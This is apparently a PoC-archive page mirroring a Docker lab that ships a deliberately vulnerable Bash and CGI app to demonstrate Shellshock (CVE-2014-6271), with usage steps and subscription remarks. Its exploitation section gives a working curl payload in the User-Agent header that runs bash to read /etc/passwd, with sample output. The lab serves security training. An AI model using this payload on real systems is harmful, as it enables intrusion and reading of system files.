Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2014-6271 PoC — GNU Bash 远程代码执行漏洞

Source
https://github.com/hmlio/vaas-cve-2014-6271
Associated Vulnerability
Title:GNU Bash 远程代码执行漏洞 (CVE-2014-6271)
Description:GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Description
Vulnerability as a service: showcasing CVS-2014-6271, a.k.a. Shellshock
Readme
# Vulnerability as a Service - CVE 2014-6271
A Debian (Buster) Linux system with a vulnerable version of bash and a web application to showcase CVS-2014-6271, a.k.a. Shellshock.

# Overview
This docker container is based on Debian Buster and has been modified to use a vulernable version of Bash (bash_4.2:2b:dfsg-0.1).

A web application is available via Apache 2 and serves a CGI script which runs shell commands.

# Usage
Install the container with `docker pull hmlio/vaas-cve-2014-6271`

Run the container with a port mapping `docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271`

You should be able to access the web application at http://your-ip:8080/.

# Exploitation
The web application/vulnerable bash version can be exploited as shown below:

```sh
# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
```

# Credits
The concept and the web application are heavily inspired by the VulnHub VM "Sokar", created by rasta_mouse.
For further details please see <a href="https://www.vulnhub.com/entry/sokar-1,113/" target="_blank">https://www.vulnhub.com/entry/sokar-1,113/</a>.
File Snapshot

 [4.0K]  /data/pocs/9f4266ddbf647af4cea6bf20f1e156ba09cc9c33
├── [1.2K]  Dockerfile
├── [ 692]  index.html
├── [ 18K]  LICENSE.md
├── [1.2K]  README.md
└── [ 266]  stats

0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →